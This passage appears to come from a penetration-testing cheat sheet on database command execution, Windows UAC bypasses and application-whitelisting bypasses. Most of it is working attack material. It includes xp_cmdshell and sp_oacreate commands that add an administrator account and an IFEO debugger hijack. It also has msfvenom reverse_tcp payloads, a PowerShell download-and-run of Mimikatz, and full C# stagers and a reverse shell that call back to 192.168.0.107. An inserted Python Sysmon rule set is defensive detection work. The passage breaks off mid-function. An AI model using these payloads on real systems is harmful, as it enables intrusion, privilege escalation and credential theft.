          #load data infile '\\\\192.168.0.19\\network\\udf.hex'
          #into table temp fields terminated by '@OsandaMalith' lines terminated by '@OsandaMalith' (data);
          #select unhex(data) from temp into dumpfile 'D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll';
          Create the functions:
          #create function cmdshell returns string soname 'udf.dll';
          #create function sys_exec returns int soname 'udf.dll';
          Run commands:
          #select cmdshell('whoami');
          #select sys_exec(''whoami'');
          Drop the functions:
          #drop function cmdshell;
          #drop function sys_exec;

          MYSQL Linux Root

          https://0xdeadbeef.info/exploits/raptor_udf2.c
          $ gcc -g -c raptor_udf2.c
          $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
          $ mysql -u root -p
          mysql> use mysql;
          mysql> create table foo(line blob);
          mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
          mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
          mysql> create function do_system returns integer soname 'raptor_udf2.so';
          mysql> select * from mysql.func;
          +-----------+-----+----------------+----------+
          | name      | ret | dl             | type     |
          +-----------+-----+----------------+----------+
          | do_system |   2 | raptor_udf2.so | function |
          +-----------+-----+----------------+----------+
          mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
          mysql> \! sh
          sh-2.05b$ cat /tmp/out
          uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)

          MSSQL

Enable xp_cmdshell

          xp_cmdshell

#exec sp_configure 'show advanced options', 1;reconfigure;
#exec sp_configure 'xp_cmdshell',1;reconfigure;
#exec master.dbo.xp_cmdshell 'ipconfig'

          xp_regwrite

          xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\taskmgr.exe'

          xp_dirtree

execute master..xp_dirtree 'c:'        // list all files and directories under c:\, including subdirectories
execute master..xp_dirtree 'c:',1      // list only the directories directly under c:\
execute master..xp_dirtree 'c:',1,1    // list the directories directly under c:\ plus files

          sp_oacreate

exec sp_configure 'show advanced options', 1;RECONFIGURE;
exec sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;
Run commands:
declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123 123 /add'
declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 123 /add'
Delete a file:
declare @result int
declare @fso_token int
exec sp_oacreate 'scripting.filesystemobject', @fso_token out
exec sp_oamethod @fso_token,'deletefile',null,'c:\1.txt'
exec sp_oadestroy @fso_token
Copy a file:
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'copyfile',null,'c:\1.txt','c:\2.txt'
Move a file:
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'movefile',null,'c:\1.txt','c:\2.txt'

Sandbox execution

Enable the sandbox:
>exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Execute:
>select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')

WarSQLKit (backdoor)

          http://eyupcelik.com.tr/guvenlik/493-mssql-fileless-rootkit-warsqlkit

          MSF

Enumerate installed patches
#use post/windows/gather/enum_patches
List usable exploits
#use post/multi/recon/local_exploit_suggester

          Bypass UAC

          MSF

>use exploit/windows/local/bypassuac
>use exploit/windows/local/bypassuac_injection
>use exploit/windows/local/bypassuac_vbs
>use exploit/windows/local/bypassuac_fodhelper
>use exploit/windows/local/bypassuac_eventvwr
>use exploit/windows/local/bypassuac_comhijack

          DccwBypassUAC

          Use on win10&win8

          K8uac

>k8uac.exe xx.exe
>k8uac.exe "command"

          CMSTP

Set UAC and AppLocker rules

Generate a malicious DLL with MSF and upload it to the target
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f dll -o /var/www/html/cm.dll
Create run.inf in the same directory as the DLL; RegisterOCXSection gives the DLL location, which can also be a remote WebDAV path such as \\192.168.0.107\webdav\cm.dll
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\y.SUB2K8\Desktop\cm.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="cmstp"
ShortSvcName="cmstp"
Run the command; it bypasses UAC and AppLocker and the session checks in
>cmstp /s run.inf

          Uacme

Over 50 bypass methods including DLL hijacking and COM hijacking: https://github.com/hfiref0x/UACME
Build with Visual Studio (2013 v120, 2015 v140, 2017 v141, 2019 v142). There are currently 59 bypassuac methods. Usage:
>akagi.exe 1
>akagi.exe 1 c:\windows\system32\cmd.exe
>akagi.exe 1 "net user 1 1 /add"
Notes: methods 5 and 9 affect the security of the target, use them with care; 5 requires a reboot
Method 6 is unavailable on x64 from Windows 8 onwards
Methods 11 and 54 support x86 only
Methods 13, 19, 30 and 50 support x64 only
Method 14 requires process injection; on x64 use the x64 build

          Bypass-UAC

https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC
>Bypass-UAC -Method UacMethodSysprep
Methods: UacMethodSysprep, ucmDismMethod, UacMethodMMC2, UacMethodTcmsetup, UacMethodNetOle32

          DLL hijack

Order in which a running program searches for a DLL:
1. The directory the program was loaded from
2. The system directory (SYSTEM32)
3. The 16-bit system directory (SYSTEM)
4. The Windows directory
5. The current directory at the time the DLL is loaded
6. The directories listed in the PATH environment variable
Use https://docs.microsoft.com/zh-cn/sysinternals/downloads/sigcheck to check whether a program runs with high privileges:
>sigcheck.exe -m c:\1.exe
and see whether autoElevate is true.
Use Process Monitor to see which DLLs the program loads when it runs. Look for a DLL that is not in the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs list and whose directory is writable by the current user, then generate a malicious DLL, back up the original and replace it; running the program again completes the hijack.

          SilentCleanup

>reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
>schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

          Sdclt

Windows 10
Method 1
>reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f    gives administrator privileges
>sdclt    a cmd window pops up
>reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f    clean up traces
Method 2
https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1
>Invoke-SDCLTBypass -Command "c:\windows\system32\cmd.exe /c C:\Windows\regedit.exe"
>sdclt.exe /KickOffElev

          Makecab&Wusa

When copying a file fails:
>makecab PsExec64.exe C:\Users\y.ZONE\Desktop\ps.cab
>wusa C:\Users\y.ZONE\Desktop\ps.cab /extract:C:\Windows\system32\

          CLR BypassUAC

Tested on win10 x64. Generate the DLL and upload it to the target's temp directory, then save the following as 1.bat and run it.
REG ADD "HKCU\Software\Classes\CLSID\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\InprocServer32" /ve /t REG_EXPAND_SZ /d "C:\Temp\test.dll" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER" /t REG_SZ /d "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" /f
REG ADD "HKCU\Environment" /v "COR_ENABLE_PROFILING" /t REG_SZ /d "1" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER_PATH" /t REG_SZ /d "C:\Temp\test.dll" /f
When the target runs a high-privilege .NET program such as gpedit.msc or eventvwr, the hijack succeeds.
After execution:

eventvwr registry hijack

Open Process Monitor, start eventvwr, press Ctrl+T to open the process tree, select the process and jump to its events
Right-click and choose Include eventvwr.exe
Show only registry activity
Add a filter for NAME NOT FOUND results
Find the corresponding registry location

Change the value to
Start the MSF listener and open eventvwr again

          Web Delivery

>use exploit/multi/script/web_delivery
>set target 3
>set payload windows/x64/meterpreter/reverse_tcp
>exploit
>use auxiliary/server/regsvr32_command_delivery_server
>set cmd ipconfig
>use exploit/windows/misc/regsvr32_applocker_bypass_server

          Invoke-PsUACme

method = "sysprep","oobe","ActionQueue","migwiz","cliconfg","winsat","mmc"
>Invoke-PsUACme -method oobe -Payload "c:\user\a\desktop\x.exe"    an absolute path is required
>Invoke-PsUACme -method oobe -Payload "powershell -w hidden -e xxxxxx"
>Invoke-PsUACme -Payload "powershell -noexit IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"
Generate a psh-reflection format script with MSFVENOM
>Invoke-PsUACme -Payload "powershell c:\1.ps1"
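Defender-side counterpart to the registry-based bypasses in this section, added here and not part of the original notes: it matches Sysmon RegistryEvent (value set) records against the keys named above (the sdclt App Paths entry, the SilentCleanup windir variable, the COR_PROFILER environment values and per-user CLSID, plus the IFEO debugger and Jet SandBoxMode keys from the MSSQL section). The rule names, the HKU-to-HKCU normalisation and the sample events are this example's own.

```python
"""Flag registry writes that land on the keys the UAC-bypass, CLR-profiler,
IFEO and Jet-sandbox entries above rely on.  Records mimic Sysmon Event ID 13
(RegistryEvent: value set); the sample events below are constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    why: str


# Sysmon logs per-user hives as HKU\<SID>\..., while 'reg add' commands use
# HKCU\...; fold both spellings to HKCU so one rule covers both.
_USER_SID = r"HKU\\S-1-5-21-[\d-]+"


def normalize(target: str) -> str:
    t = target.replace("/", "\\").strip()
    t = re.sub(r"^HKEY_CURRENT_USER\\", r"HKCU\\", t, flags=re.I)
    t = re.sub(r"^HKEY_LOCAL_MACHINE\\", r"HKLM\\", t, flags=re.I)
    t = re.sub(r"^HKEY_USERS\\", r"HKU\\", t, flags=re.I)
    t = re.sub(rf"^{_USER_SID}\\", r"HKCU\\", t, flags=re.I)
    return t


RULES = [
    Rule("sdclt_app_paths",
         re.compile(r"^HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control\.exe(\\|$)", re.I),
         "sdclt.exe resolves control.exe through a per-user App Paths entry"),
    Rule("silentcleanup_windir",
         re.compile(r"^HKCU\\Environment\\windir$", re.I),
         "the SilentCleanup task expands %windir% from the user's environment"),
    Rule("clr_profiler_env",
         re.compile(r"^HKCU\\Environment\\COR_(PROFILER|ENABLE_PROFILING|PROFILER_PATH)$", re.I),
         "COR_PROFILER makes every .NET process, elevated ones included, load the profiler DLL"),
    Rule("clr_profiler_clsid",
         re.compile(r"^HKCU\\Software\\Classes\\CLSID\\\{[0-9A-F-]{36}\}\\InprocServer32(\\|$)", re.I),
         "per-user CLSID registration shadowing a COM server"),
    Rule("ifeo_debugger",
         re.compile(r"^HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\[^\\]+\\Debugger$", re.I),
         "IFEO debugger swaps the binary that is launched for an accessibility tool"),
    Rule("jet_sandbox",
         re.compile(r"^HKLM\\SOFTWARE\\Microsoft\\Jet\\4\.0\\Engines\\SandBoxMode$", re.I),
         "Jet SandBoxMode enables shell() inside OPENROWSET queries"),
    Rule("run_key",
         re.compile(r"^HK(LM|CU)\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I),
         "autostart value written"),
]


def match_registry_event(target_object: str) -> list[str]:
    """Names of the rules whose key pattern matches this TargetObject."""
    target = normalize(target_object)
    return [r.name for r in RULES if r.pattern.search(target)]


def scan(events: list[dict]) -> list[dict]:
    """Run every rule over a batch of RegistryEvent records."""
    findings = []
    for ev in events:
        for name in match_registry_event(ev["TargetObject"]):
            rule = next(r for r in RULES if r.name == name)
            findings.append({"rule": name, "why": rule.why,
                             "image": ev.get("Image", ""),
                             "target": ev["TargetObject"],
                             "details": ev.get("Details", "")})
    return findings


# Constructed sample events (SID and paths are made up for this example).
_SID = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": _SID + r"\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)",
     "Details": r"C:\Windows\system32\cmd.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": _SID + r"\Environment\windir",
     "Details": r"cmd /K reg delete hkcu\Environment /v windir /f && REM "},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "TargetObject": _SID + r"\Environment\COR_PROFILER_PATH",
     "Details": r"C:\Temp\test.dll"},
    {"Image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger",
     "Details": r"c:\windows\system32\taskmgr.exe"},
    # Benign: Explorer saving a folder-view preference.
    {"Image": r"C:\Windows\explorer.exe",
     "TargetObject": _SID + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['image']} -> {f['target']} = {f['details']!r}")
```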

Whitelist

          GreatSCT

>git clone https://github.com/GreatSCT/GreatSCT.git
>cd GreatSCT/setup & ./setup.sh
>use Bypass
>list
>use regasm/meterpreter/rev_tcp.py
>msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

          JSRat

          >JSRat.py -i 192.168.1.107 -p 4444

          Odbcconf.exe

>odbcconf.exe /a {regsvr C:\shell.dll}    the file can have any extension

          Msiexec.exe

>msiexec /y c:\user\admin\desktop\1.dll
>msiexec /q /i http://192.168.0.107/dll.dll

          InstallUtil.exe

>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:y.exe /unsafe C:\Users\y\Desktop\1.cs
1.cs
using System;
using System.Net;
using System.Linq;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Threading;
using System.Configuration.Install;
using System.Windows.Forms;

public class GQLBigHgUniLuVx
{
    public static void Main()
    {
        while (true)
        {
            MessageBox.Show("doge");
            Console.ReadLine();
        }
    }
}

// InstallUtil /U calls Uninstall(), which is where the payload runs.
[System.ComponentModel.RunInstaller(true)]
public class esxWUYUTWShqW : System.Configuration.Install.Installer
{
    public override void Uninstall(System.Collections.IDictionary zWrdFAUHmunnu)
    {
        jkmhGrfzsKQeCG.LCIUtRN();
    }
}

public class jkmhGrfzsKQeCG
{
    [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 YUtHhF, UInt32 VenifEUR, UInt32 NIHbxnOmrgiBGL, UInt32 KIheHEUxhAfOI);
    [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 GDmElasSZbx, UInt32 rGECFEZG, UInt32 UyBSrAIp, IntPtr sPEeJlufmodo, UInt32 jmzHRQU, ref UInt32 SnpQPGMvDbMOGmn);
    [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pRIwbzTTS, UInt32 eRLAWWYQnq);

    // Fetch the length-prefixed stage from the handler.
    static byte[] ErlgHH(string ZwznjBJY, int KsMEeo)
    {
        IPEndPoint qAmSXHOKCbGlysd = new IPEndPoint(IPAddress.Parse(ZwznjBJY), KsMEeo);
        Socket XXxIoIXNCle = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
        try { XXxIoIXNCle.Connect(qAmSXHOKCbGlysd); }
        catch { return null; }
        byte[] UmquAHRnhhpuE = new byte[4];
        XXxIoIXNCle.Receive(UmquAHRnhhpuE, 4, 0);
        int kFVRSNnpj = BitConverter.ToInt32(UmquAHRnhhpuE, 0);
        byte[] qaYyFq = new byte[kFVRSNnpj + 5];
        int SRCDELibA = 0;
        while (SRCDELibA < kFVRSNnpj)
        {
            SRCDELibA += XXxIoIXNCle.Receive(qaYyFq, SRCDELibA + 5, (kFVRSNnpj - SRCDELibA) < 4096 ? (kFVRSNnpj - SRCDELibA) : 4096, 0);
        }
        byte[] TvvzOgPLqwcFFv = BitConverter.GetBytes((int)XXxIoIXNCle.Handle);
        Array.Copy(TvvzOgPLqwcFFv, 0, qaYyFq, 1, 4);
        qaYyFq[0] = 0xBF;
        return qaYyFq;
    }

    // Copy the stage into executable memory and run it in a new thread.
    static void cmMtjerv(byte[] HEHUjJhkrNS)
    {
        if (HEHUjJhkrNS != null)
        {
            UInt32 WcpKfU = VirtualAlloc(0, (UInt32)HEHUjJhkrNS.Length, 0x1000, 0x40);
            Marshal.Copy(HEHUjJhkrNS, 0, (IntPtr)(WcpKfU), HEHUjJhkrNS.Length);
            IntPtr UhxtIFnlOQatrk = IntPtr.Zero;
            UInt32 wdjYKFDCCf = 0;
            IntPtr XVYcQxpp = IntPtr.Zero;
            UhxtIFnlOQatrk = CreateThread(0, 0, WcpKfU, XVYcQxpp, 0, ref wdjYKFDCCf);
            WaitForSingleObject(UhxtIFnlOQatrk, 0xFFFFFFFF);
        }
    }

    public static void LCIUtRN()
    {
        byte[] IBtCWU = null;
        IBtCWU = ErlgHH("192.168.0.107", 12138);
        cmMtjerv(IBtCWU);
    }
}
After building the exe, run:
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\y.exe
MSF listens on port 12138

          Compiler.exe

>C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe 1.xml 1.tcp
1.xml
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
  <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
    <d2p1:string>1.tcp</d2p1:string>
  </files>
  <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
    <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
    <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
    <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
    <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
    <evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
    <generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
    <generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
    <includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
    <linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
    <mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
    <outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
    <tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
    <treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
    <warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
    <win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
    <d2p1:checkTypes>false</d2p1:checkTypes>
    <d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
    <d2p1:compilerOptions i:nil="true" />
    <d2p1:generateCCU>false</d2p1:generateCCU>
    <d2p1:languageToUse>CSharp</d2p1:languageToUse>
    <d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
    <d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
    <d2p1:mtInfo i:nil="true"/>
    <d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
  </parameters>
</CompilerInput>
1.tcp
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Workflow.Activities;

// The workflow compiler instantiates the activity class; its constructor
// opens the connection and pipes cmd.exe over it.
public class Program : SequentialWorkflowActivity
{
    static StreamWriter streamWriter;

    public Program()
    {
        using (TcpClient client = new TcpClient("192.168.0.107", 12138))
        {
            using (Stream stream = client.GetStream())
            {
                using (StreamReader rdr = new StreamReader(stream))
                {
                    streamWriter = new StreamWriter(stream);
                    StringBuilder strInput = new StringBuilder();
                    Process p = new Process();
                    p.StartInfo.FileName = "cmd.exe";
                    p.StartInfo.CreateNoWindow = true;
                    p.StartInfo.UseShellExecute = false;
                    p.StartInfo.RedirectStandardOutput = true;
                    p.StartInfo.RedirectStandardInput = true;
                    p.StartInfo.RedirectStandardError = true;
                    p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
                    p.Start();
                    p.BeginOutputReadLine();
                    while (true)
                    {
                        strInput.Append(rdr.ReadLine());
                        p.StandardInput.WriteLine(strInput);
                        strInput.Remove(0, strInput.Length);
                    }
                }
            }
        }
    }

    private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
    {
        StringBuilder strOutput = new StringBuilder();
        if (!String.IsNullOrEmpty(outLine.Data))
        {
            try
            {
                strOutput.Append(outLine.Data);
                streamWriter.WriteLine(strOutput);
                streamWriter.Flush();
            }
            catch (Exception err) { }
        }
    }
}
>msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f csharp
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe 1.xml 1.cs
1.cs
using System;
using System.Workflow.Activities;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Threading;

class yrDaTlg : SequentialWorkflowActivity
{
    [DllImport("kernel32")] private static extern IntPtr VirtualAlloc(UInt32 rCfMkmxRSAakg, UInt32 qjRsrljIMB, UInt32 peXiTuE, UInt32 AkpADfOOAVBZ);
    [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr DStOGXQMMkP, uint CzzIpcuQppQSTBJ, uint JCFImGhkRqtwANx, out uint exgVpSg);
    [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 eisuQbXKYbAvA, UInt32 WQATOZaFz, IntPtr AEGJQOn, IntPtr SYcfyeeSgPl, UInt32 ZSheqBwKtDf, ref UInt32 SZtdSB);
    [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr KqJNFlHpsKOV, UInt32 EYBOArlCLAM);

    public yrDaTlg()
    {
        byte[] QWKpWKhcs = {SHELLCODE};
        IntPtr AmnGaO = VirtualAlloc(0, (UInt32)QWKpWKhcs.Length, 0x3000, 0x04);
        Marshal.Copy(QWKpWKhcs, 0, (IntPtr)(AmnGaO), QWKpWKhcs.Length);
        IntPtr oXmoNUYvivZlXj = IntPtr.Zero;
        UInt32 XVXTOi = 0;
        IntPtr pAeCTfwBS = IntPtr.Zero;
        uint BnhanUiUJaetgy;
        bool iSdNUQK = VirtualProtect(AmnGaO, (uint)0x1000, (uint)0x20, out BnhanUiUJaetgy);
        oXmoNUYvivZlXj = CreateThread(0, 0, AmnGaO, pAeCTfwBS, 0, ref XVXTOi);
        WaitForSingleObject(oXmoNUYvivZlXj, 0xFFFFFFFF);
    }
}

          Csc

>msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f csharp
>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:C:\Users\y\Desktop\shell.exe /platform:x64 /unsafe C:\Users\y\Desktop\shell.cs
>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe
shell.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

public class Program
{
    public static void Main() { }
}

[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        Shellcode.exec();
    }
}

public class Shellcode
{
    public static void exec()
    {
        byte[] shellcode = new byte[510] {SHELLCODE};
        UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
        IntPtr hThread = IntPtr.Zero;
        UInt32 threadId = 0;
        IntPtr pinfo = IntPtr.Zero;
        hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
        WaitForSingleObject(hThread, 0xFFFFFFFF);
    }

    private static UInt32 MEM_COMMIT = 0x1000;
    private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

    [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
    [DllImport("kernel32")] private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);
    [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
    [DllImport("kernel32")] private static extern bool CloseHandle(IntPtr handle);
    [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
    [DllImport("kernel32")] private static extern IntPtr GetModuleHandle(string moduleName);
    [DllImport("kernel32")] private static extern UInt32 GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")] private static extern UInt32 LoadLibrary(string lpFileName);
    [DllImport("kernel32")] private static extern UInt32 GetLastError();
}

          Regasm

>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:C:\Users\y\Desktop\dll.dll /unsafe C:\Users\y\Desktop\dll.cs
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /u dll.dll
dll.cs
using System;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.EnterpriseServices;

namespace HYlDKsYF
{
    // regasm /u calls the [ComUnregisterFunction] method, which is where the payload runs.
    public class kxKhdVzWQXolmmF : ServicedComponent
    {
        public kxKhdVzWQXolmmF() { Console.WriteLine("doge"); }

        [ComRegisterFunction]
        public static void RegisterClass(string pNNHrTZzW)
        {
            ZApOAKJKY.QYJOTklTwn();
        }

        [ComUnregisterFunction]
        public static void UnRegisterClass(string pNNHrTZzW)
        {
            ZApOAKJKY.QYJOTklTwn();
        }
    }

    public class ZApOAKJKY
    {
        [DllImport("kernel32")] private static extern UInt32 HeapCreate(UInt32 FJyyNB, UInt32 fwtsYaiizj, UInt32 dHJhaXQiaqW);
        [DllImport("kernel32")] private static extern UInt32 HeapAlloc(UInt32 bqtaDNfVCzVox, UInt32 hjDFdZuT, UInt32 JAVAYBFdojxsgo);
        [DllImport("kernel32")] private static extern UInt32 RtlMoveMemory(UInt32 AQdEyOhn, byte[] wknmfaRmoElGo, UInt32 yRXPRezIkcorSOo);
        [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 uQgiOlrrBaR, UInt32 BxkWKqEKnp, UInt32 lelfRubuprxr, IntPtr qPzVKjdiF, UInt32 kNXJcS, ref UInt32 atiLJcRPnhfyGvp);
        [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr XSjyzoKzGmuIOcD, UInt32 VumUGj);

        // Fetch the length-prefixed stage from the handler.
        static byte[] HMSjEXjuIzkkmo(string aCWWUttzmy, int iJGvqiEDGLhjr)
        {
            IPEndPoint YUXVAnzAurxH = new IPEndPoint(IPAddress.Parse(aCWWUttzmy), iJGvqiEDGLhjr);
            Socket MXCEuiuRIWgOYze = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
            try { MXCEuiuRIWgOYze.Connect(YUXVAnzAurxH); }
            catch { return null; }
            byte[] Bjpvhc = new byte[4];
            MXCEuiuRIWgOYze.Receive(Bjpvhc, 4, 0);
            int IETFBI = BitConverter.ToInt32(Bjpvhc, 0);
            byte[] ZKSAAFwxgSDnTW = new byte[IETFBI + 5];
            int JFPJLlk = 0;
            while (JFPJLlk < IETFBI)
            {
                JFPJLlk += MXCEuiuRIWgOYze.Receive(ZKSAAFwxgSDnTW, JFPJLlk + 5, (IETFBI - JFPJLlk) < 4096 ? (IETFBI - JFPJLlk) : 4096, 0);
            }
            byte[] nXRztzNVwPavq = BitConverter.GetBytes((int)MXCEuiuRIWgOYze.Handle);
            Array.Copy(nXRztzNVwPavq, 0, ZKSAAFwxgSDnTW, 1, 4);
            ZKSAAFwxgSDnTW[0] = 0xBF;
